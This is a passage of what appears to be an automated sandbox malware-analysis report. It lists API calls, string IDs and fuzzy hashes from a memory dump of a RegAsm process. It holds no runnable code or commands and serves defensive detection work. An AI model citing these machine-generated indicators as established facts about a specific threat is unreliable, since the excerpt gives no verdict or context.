                            • Instruction Fuzzy Hash: 02215BB2500604EFD720DF18D881CAAB7F9EF49324B114A6EE452976A1CB35B9158B98
                            APIs
                            Strings
                            Memory Dump Source
                            • Source File: 0000000B.00000002.380734879.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd
                            Similarity
                            • API ID: memcpy
                            • String ID: @
                            • API String ID: 3510742995-2766056989
                            • Opcode ID: 871df5fef43ba47fad24df649b94f0d233f9868d8bda670e26c25dba733484ff
                            • Instruction ID: b25eae0e74258469ce0af521155fdf6a80f479b4e9ffe9ec94392e3587c9c40c
                            • Opcode Fuzzy Hash: 871df5fef43ba47fad24df649b94f0d233f9868d8bda670e26c25dba733484ff
                            • Instruction Fuzzy Hash: 65115EF2A003057FDB349E15D980C9A77A8EF50394B00062FF90AD6151E7B8DEA5C7D9
                            APIs
                            • strlen.MSVCRT ref: 0040B0D8
                            • ??3@YAXPAX@Z.MSVCRT ref: 0040B0FB
                              • Part of subcall function 004099F4: malloc.MSVCRT ref: 00409A10
                              • Part of subcall function 004099F4: memcpy.MSVCRT ref: 00409A28
                              • Part of subcall function 004099F4: ??3@YAXPAX@Z.MSVCRT ref: 00409A31
                            • ??3@YAXPAX@Z.MSVCRT ref: 0040B12C
                            • memcpy.MSVCRT ref: 0040B159
                            Memory Dump Source
                            • Source File: 0000000B.00000002.380734879.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd
                            Similarity
                            • API ID: ??3@$memcpy$mallocstrlen
                            • String ID:
                            • API String ID: 1171893557-0
                            • Opcode ID: 1032aca3c4d565b21c9c93c1da03fa01242ca6c05261a3900927d5bb2d17b358
                            • Instruction ID: 61abf4b4d63bdfee40e3433ef4540d9b033b11d4199be086b3082c0bee804e2f
                            • Opcode Fuzzy Hash: 1032aca3c4d565b21c9c93c1da03fa01242ca6c05261a3900927d5bb2d17b358
                            • Instruction Fuzzy Hash: CA113A712042019FD711DB98FC499267B66EB8733AB25833BF4045A2A3CBB99834865F
                            APIs
                            • memset.MSVCRT ref: 004144E7
                              • Part of subcall function 0040A353: _snwprintf.MSVCRT ref: 0040A398
                              • Part of subcall function 0040A353: memcpy.MSVCRT ref: 0040A3A8
                            • WritePrivateProfileStringW.KERNEL32(?,?,?,?), ref: 00414510
                            • memset.MSVCRT ref: 0041451A
                            • GetPrivateProfileStringW.KERNEL32(?,?,0044E518,?,00002000,?), ref: 0041453C
                            Memory Dump Source
                            • Source File: 0000000B.00000002.380734879.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd
                            Similarity
                            • API ID: PrivateProfileStringmemset$Write_snwprintfmemcpy
                            • String ID:
                            • API String ID: 1127616056-0
                            • Opcode ID: 02b9e3d0e0b7074fd9b2be70e01a8c10e85f5fbe64ebb4837650a41ca567b1c2
                            • Instruction ID: e03fcf36bb778615f94f946172f2cadce4c7e53e7889dedf6030812535802df7
                            • Opcode Fuzzy Hash: 02b9e3d0e0b7074fd9b2be70e01a8c10e85f5fbe64ebb4837650a41ca567b1c2
                            • Instruction Fuzzy Hash: 9A1170B1500119BFEF115F65EC02EDA7B69EF04714F100066FB09B2060E6319A60DB9D
                            APIs
                            • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,?,000000FF,00000000,00000000,00000000,00000000,00000000,?,?,756F18FE,?,0041755F,?), ref: 00417452
                            • malloc.MSVCRT ref: 00417459
                            • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,?,000000FF,00000000,?,00000000,00000000,?,756F18FE,?,0041755F,?), ref: 00417478
                            • ??3@YAXPAX@Z.MSVCRT ref: 0041747F
                            Memory Dump Source
                            • Source File: 0000000B.00000002.380734879.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd
                            Similarity
                            • API ID: ByteCharMultiWide$??3@malloc
                            • String ID:
                            • API String ID: 4284152360-0
                            • Opcode ID: 04ed014176e6e25a75c769d411d0e5b4418e4c479d680d12870536ad94e91e4d
                            • Instruction ID: 8389f0226c663b3c6d8c6253af8546a3d73aba679155ae8f7c82d0c1376384d0
                            • Opcode Fuzzy Hash: 04ed014176e6e25a75c769d411d0e5b4418e4c479d680d12870536ad94e91e4d
                            • Instruction Fuzzy Hash: 1DF0E9B620D21E3F7B006AB55CC0C7B7B9CD7862FCB11072FF51091180E9594C1116B6
                            APIs
                            • GetModuleHandleW.KERNEL32(00000000), ref: 00412403
                            • RegisterClassW.USER32(?), ref: 00412428
                            • GetModuleHandleW.KERNEL32(00000000), ref: 0041242F
                            • CreateWindowExW.USER32(00000000,00000000,0044E518,00CF0000,00000000,00000000,00000280,000001E0,00000000,00000000,00000000), ref: 00412455
                            Memory Dump Source
                            • Source File: 0000000B.00000002.380734879.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd
                            Similarity
                            • API ID: HandleModule$ClassCreateRegisterWindow
                            • String ID:
                            • API String ID: 2678498856-0
                            • Opcode ID: ffa2941c40dc3e4da5dfeb6f60aef2ef72cf6d205e20c7803454451710b81cbd
                            • Instruction ID: 2742b6e08e64d4f702ac0bdc031c2178a10537c5a2141806c9029dd5a11ba4c1
                            • Opcode Fuzzy Hash: ffa2941c40dc3e4da5dfeb6f60aef2ef72cf6d205e20c7803454451710b81cbd
                            • Instruction Fuzzy Hash: E601E5B1941228ABD7119FA68C89ADFBEBCFF09B14F10411AF514A2240D7B456408BE9
                            APIs
                            • MultiByteToWideChar.KERNEL32(0000FDE9,00000000,00418178,000000FF,00000000,00000000,00417D63,?,?,00417D63,00418178,00000000,?,004183E5,?,00000000), ref: 004173FF
                            • malloc.MSVCRT ref: 00417407
                            • MultiByteToWideChar.KERNEL32(0000FDE9,00000000,00418178,000000FF,00000000,00000000,?,00417D63,00418178,00000000,?,004183E5,?,00000000,00000000,?), ref: 0041741E
                            • ??3@YAXPAX@Z.MSVCRT ref: 00417425
                            Memory Dump Source
                            • Source File: 0000000B.00000002.380734879.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd
                            Similarity
                            • API ID: ByteCharMultiWide$??3@malloc
                            • String ID:
                            • API String ID: 4284152360-0
                            • Opcode ID: 3df1ff1ad5f7619570b5295ff2d6745c95529d6511ab958c6202ec18d606cc9c
                            • Instruction ID: cad4d062c051d68cf548c6c9b5623cfc012c7edadb1d539185634ca375d1558c
                            • Opcode Fuzzy Hash: 3df1ff1ad5f7619570b5295ff2d6745c95529d6511ab958c6202ec18d606cc9c
                            • Instruction Fuzzy Hash: E7F0377620921E7BDA1029655C40D77779CEB8B675B11072BBA10D21C1ED59D81005B5
                            APIs
                            • memset.MSVCRT ref: 0040F673
                            • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,?,000000FF,?,00007FFF,00000000,00000000,?,<item>), ref: 0040F690
                            • strlen.MSVCRT ref: 0040F6A2
                            • WriteFile.KERNEL32(00000000,?,00000000,?,00000000), ref: 0040F6B3
                            Memory Dump Source
                            • Source File: 0000000B.00000002.380734879.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd
                            Similarity
                            • API ID: ByteCharFileMultiWideWritememsetstrlen
                            • String ID:
                            • API String ID: 2754987064-0
                            • Opcode ID: 3f0454cb73c2afb10a3316e2dc28fa1dd1c693e32e23138b57773469a51e87f3
                            • Instruction ID: e5447571fde1e0de43d26e7f5909b1ba013d3ab3fbf9ce0dfcc5e01eb4e41d37
                            • Opcode Fuzzy Hash: 3f0454cb73c2afb10a3316e2dc28fa1dd1c693e32e23138b57773469a51e87f3
                            • Instruction Fuzzy Hash: 03F062B680102C7FEB81A794DC81DEB77ACEB05258F0080B2B715D2140E9749F484F7D
                            APIs
                            • memset.MSVCRT ref: 0040F6E2
                            • WideCharToMultiByte.KERNEL32(00000000,00000000,?,000000FF,?,00001FFF,00000000,00000000,?,<item>), ref: 0040F6FB
                            • strlen.MSVCRT ref: 0040F70D
                            • WriteFile.KERNEL32(00000000,?,00000000,?,00000000), ref: 0040F71E
                            Memory Dump Source
                            • Source File: 0000000B.00000002.380734879.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd
                            Similarity
                            • API ID: ByteCharFileMultiWideWritememsetstrlen
                            • String ID:
                            • API String ID: 2754987064-0
                            • Opcode ID: 7e04724105a3fa4aadef5922e8bb643722353f9661974f919d975e4a71db6ff5
                            • Instruction ID: 4069f22fd96ae38f7b0fbed24adb75974e75abfa9f51d26af0f678a77882025e
                            • Opcode Fuzzy Hash: 7e04724105a3fa4aadef5922e8bb643722353f9661974f919d975e4a71db6ff5
                            • Instruction Fuzzy Hash: C8F06DB780022CBFFB059B94DCC8DEB77ACEB05254F0000A2B715D2042E6749F448BB8
                            APIs
                            Strings
                            Memory Dump Source
                            • Source File: 0000000B.00000002.380734879.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd
                            Similarity
                            • API ID: wcscpy$CloseHandle
                            • String ID: General
                            • API String ID: 3722638380-26480598
                            • Opcode ID: d203a37054ecec13293c6845d931113d91e33057b6480a05be5df7ab04b5f2c3
                            • Instruction ID: 029e45c8424a23c50dbc4d8c1dfe1f9d14d00e2cf8bd1bf10ef2c4f99c7741b7
                            • Opcode Fuzzy Hash: d203a37054ecec13293c6845d931113d91e33057b6480a05be5df7ab04b5f2c3
                            • Instruction Fuzzy Hash: 52F024B30083146FF7205B509C85EAF769CEB86369F25482FF05592092C7398C448669
                            APIs
                              • Part of subcall function 00409D7F: memset.MSVCRT ref: 00409D9E
                              • Part of subcall function 00409D7F: GetClassNameW.USER32(?,00000000,000000FF), ref: 00409DB5
                              • Part of subcall function 00409D7F: _wcsicmp.MSVCRT ref: 00409DC7
                            • SetBkMode.GDI32(?,00000001), ref: 004143A2
                            • SetBkColor.GDI32(?,00FFFFFF), ref: 004143B0
                            • SetTextColor.GDI32(?,00C00000), ref: 004143BE
                            • GetStockObject.GDI32(00000000), ref: 004143C6
                            Memory Dump Source
                            • Source File: 0000000B.00000002.380734879.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd
                            Similarity
                            • API ID: Color$ClassModeNameObjectStockText_wcsicmpmemset
                            • String ID:
                            • API String ID: 764393265-0
                            • Opcode ID: 511a8a1029f4fd91347c0110e60971c3c9d55721028eb227f3be943e95f629a7
                            • Instruction ID: 55a1794077c12dabf0ba6e1c8d3319674f3f2ba5a0574a39bcd6537ad23d1771
                            • Opcode Fuzzy Hash: 511a8a1029f4fd91347c0110e60971c3c9d55721028eb227f3be943e95f629a7
                            • Instruction Fuzzy Hash: 3AF06835200219BBCF112FA5EC06EDD3F25BF05321F104536FA25A45F1CBB59D609759
                            APIs
                            • FileTimeToSystemTime.KERNEL32(?,?), ref: 0040A76D
                            • SystemTimeToTzSpecificLocalTime.KERNEL32(00000000,?,?,?,?), ref: 0040A77D
                            • SystemTimeToFileTime.KERNEL32(?,?,?,?), ref: 0040A78C
                            Memory Dump Source
                            • Source File: 0000000B.00000002.380734879.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd
                            Similarity
                            • API ID: Time$System$File$LocalSpecific
                            • String ID:
                            • API String ID: 979780441-0
                            • Opcode ID: e6f681992166f7eacb6a90eac37249c69a118d36aeffaac3dc06015c0a75a69a
                            • Instruction ID: f583aad53f3de4022dcae7e9f33737e8013f67213d7447df07319dea818b2b95
                            • Opcode Fuzzy Hash: e6f681992166f7eacb6a90eac37249c69a118d36aeffaac3dc06015c0a75a69a
                            • Instruction Fuzzy Hash: 48F08272900219AFEB019BB1DC49FBBB3FCBB0570AF04443AE112E1090D774D0058B65
                            APIs
                            • memcpy.MSVCRT ref: 004134E0
                            • memcpy.MSVCRT ref: 004134F2
                            • GetModuleHandleW.KERNEL32(00000000), ref: 00413505
                            • DialogBoxParamW.USER32(00000000,0000006B,?,Function_000131DC,00000000), ref: 00413519
                            Memory Dump Source
                            • Source File: 0000000B.00000002.380734879.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd
                            Similarity
                            • API ID: memcpy$DialogHandleModuleParam
                            • String ID:
                            • API String ID: 1386444988-0
                            • Opcode ID: d55c8f406ca3c44be23ebae39d0952233c85391216aaf70b52daa0aa76105663
                            • Instruction ID: 364e94b7bdcda47f4d7f1f8d7aeee0d56301a77e6e21c3ce81869cca2c347424
                            • Opcode Fuzzy Hash: d55c8f406ca3c44be23ebae39d0952233c85391216aaf70b52daa0aa76105663
                            • Instruction Fuzzy Hash: 80F0E272A843207BF7207FA5AC0AB477E94FB05B03F114826F600E50D2C2B988518F8D
                            APIs
                            • wcschr.MSVCRT ref: 0040F79E
                            • wcschr.MSVCRT ref: 0040F7AC
                              • Part of subcall function 0040AA8C: wcslen.MSVCRT ref: 0040AAA8
                              • Part of subcall function 0040AA8C: memcpy.MSVCRT ref: 0040AACB
                            Strings
                            Memory Dump Source
                            • Source File: 0000000B.00000002.380734879.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd
                            Similarity
                            • API ID: wcschr$memcpywcslen
                            • String ID: "
                            • API String ID: 1983396471-123907689
                            • Opcode ID: a49a7bca3fdcf7d664bb1a19bbfdf9ac20233bdad490a911e177b035a317b33a
                            • Instruction ID: b5ec2b97dc3a1d34b4ae52474db4a85f3d32b900c8044ec90cdce640e07fed14
                            • Opcode Fuzzy Hash: a49a7bca3fdcf7d664bb1a19bbfdf9ac20233bdad490a911e177b035a317b33a
                            • Instruction Fuzzy Hash: 7C315532904204ABDF24EFA6C8419EEB7B4EF44324F20457BEC10B75D1DB789A46CE99
                            APIs
                            Strings
                            Memory Dump Source
                            • Source File: 0000000B.00000002.380734879.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd
                            Similarity
                            • API ID: _snwprintfmemcpy
                            • String ID: %2.2X
                            • API String ID: 2789212964-323797159
                            • Opcode ID: 565383a1db30c24bbe212324ccaa161bb2139c15501903e42e5a35b00c7b7038
                            • Instruction ID: 802357eb4f50a043e47c8b78e7782d62930b20b04af67ea92e1f933aeb07fc5a
                            • Opcode Fuzzy Hash: 565383a1db30c24bbe212324ccaa161bb2139c15501903e42e5a35b00c7b7038
                            • Instruction Fuzzy Hash: 71118E32900309BFEB10DFE8D8829AFB3B9FB05314F108476ED11E7141D6789A258B96
                            APIs
                            Strings
                            Memory Dump Source
                            • Source File: 0000000B.00000002.380734879.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd
                            Similarity
                            • API ID: _snwprintf
                            • String ID: %%-%d.%ds
                            • API String ID: 3988819677-2008345750
                            • Opcode ID: ff7c17540168d96ed4966b56b0a467b3337874ab214ea8a90bdbbe2252cfc3dc
                            • Instruction ID: 7541af853baca77dfc804340e5f0ab0fe899c5989b891af63cf45e557cb41de3
                            • Opcode Fuzzy Hash: ff7c17540168d96ed4966b56b0a467b3337874ab214ea8a90bdbbe2252cfc3dc
                            • Instruction Fuzzy Hash: B801DE71200204BFD720EE59CC82D5AB7E8FB48308B00443AF846A7692D636E854CB65
                            APIs
                            • memset.MSVCRT ref: 0040E770
                            • SendMessageW.USER32(F^@,0000105F,00000000,?), ref: 0040E79F
                            Strings
                            Memory Dump Source
                            • Source File: 0000000B.00000002.380734879.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd
                            Similarity
                            • API ID: MessageSendmemset
                            • String ID: F^@
                            • API String ID: 568519121-3652327722
                            • Opcode ID: f8314852293f46423bc2a010faad31e0b7cb282108ef47112cad279f3d3f551f
                            • Instruction ID: 5049a961280a3e8282645b70ff0f7bf8ff78c54eb6baa8beabb6daf17925e322
                            • Opcode Fuzzy Hash: f8314852293f46423bc2a010faad31e0b7cb282108ef47112cad279f3d3f551f
                            • Instruction Fuzzy Hash: A701A239900204ABEB209F5ACC81EABB7F8FF44B45F008429E854A7291D3349855CF79
                            APIs
                            Strings
                            Memory Dump Source
                            • Source File: 0000000B.00000002.380734879.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd
                            Similarity
                            • API ID: PlacementWindowmemset
                            • String ID: WinPos
                            • API String ID: 4036792311-2823255486
                            • Opcode ID: 43a26fe09d4836415a0f9153b5f51c370111d8f5fda2234af2192006d5bb601b
                            • Instruction ID: 942d740d8c3c01bede0812328a3a4706cce13fdf2e849e9dfea5930b7654417c
                            • Opcode Fuzzy Hash: 43a26fe09d4836415a0f9153b5f51c370111d8f5fda2234af2192006d5bb601b
                            • Instruction Fuzzy Hash: D4F096B0600204EFEB04DF55D899F6A33E8EF04701F1440B9F909DB1D1E7B89A04C729
                            APIs
                            Strings
                            Memory Dump Source
                            • Source File: 0000000B.00000002.380734879.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd
                            Similarity
                            • API ID: ??3@DeleteObject
                            • String ID: r!A
                            • API String ID: 1103273653-628097481
                            • Opcode ID: 50c536e2c83fb8bec4500b48a67d64bb266b61e0188dcb515110e4721c15bf1b
                            • Instruction ID: d381ae2e1f6c469d4091c7bd434485f036f098756071eb86a226830a39d2e28c
                            • Opcode Fuzzy Hash: 50c536e2c83fb8bec4500b48a67d64bb266b61e0188dcb515110e4721c15bf1b
                            • Instruction Fuzzy Hash: 72E04F75000302DFD7115F26E400782B7F5FF85315F11455EE89497151EBB96164CE19
                            APIs
                            Memory Dump Source
                            • Source File: 0000000B.00000002.380734879.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd
                            Similarity
                            • API ID: memcpy$memset
                            • String ID:
                            • API String ID: 438689982-0
                            • Opcode ID: ef116662622e1dd2984e515fcaedae38b96dc359db8ee055bda91140f73fb117
                            • Instruction ID: 797e1fd24865db6de4a95defd5ca955254a0dec7c2ff798398e4890fb9874305
                            • Opcode Fuzzy Hash: ef116662622e1dd2984e515fcaedae38b96dc359db8ee055bda91140f73fb117
                            • Instruction Fuzzy Hash: 1B51A2B5A00219EBDF14DF55D882BAEBBB5FF04340F54806AE904AA245E7389E50DBD8
                            APIs
                            Memory Dump Source
                            • Source File: 0000000B.00000002.380734879.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd
                            Similarity
                            • API ID: ??2@$memset
                            • String ID:
                            • API String ID: 1860491036-0
                            • Opcode ID: 132c9519558d853c1af1b7fa7761ae76911dbcbc7ff65e94ed4645376a2186b4
                            • Instruction ID: 7dda0de82ffecb18951b1be6aadeef514c87807746e1e94fbb8d74dd8fa57bec
                            • Opcode Fuzzy Hash: 132c9519558d853c1af1b7fa7761ae76911dbcbc7ff65e94ed4645376a2186b4
                            • Instruction Fuzzy Hash: 4F21F3B1A003008FDB219F2B9445912FBE8FF90310B2AC8AF9158CB2B2D7B8C454CF15
                            APIs
                            Memory Dump Source
                            • Source File: 0000000B.00000002.380734879.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd
                            Similarity
                            • API ID: ??2@
                            • String ID:
                            • API String ID: 1033339047-0
                            • Opcode ID: 6589a97820dd4164dbe9b7b561e5d9da651562f836a554c3bd3b183484c6dcee
                            • Instruction ID: 5f4fc1bc6a90e200713bb7744dd8ab6a017b0cf4e98027731d5581fdeff4b0c3
                            • Opcode Fuzzy Hash: 6589a97820dd4164dbe9b7b561e5d9da651562f836a554c3bd3b183484c6dcee
                            • Instruction Fuzzy Hash: B00121B2A413005EEB7ADF38EE5772966A0AF4C351F01453EA246CD1F6EEF58480CB49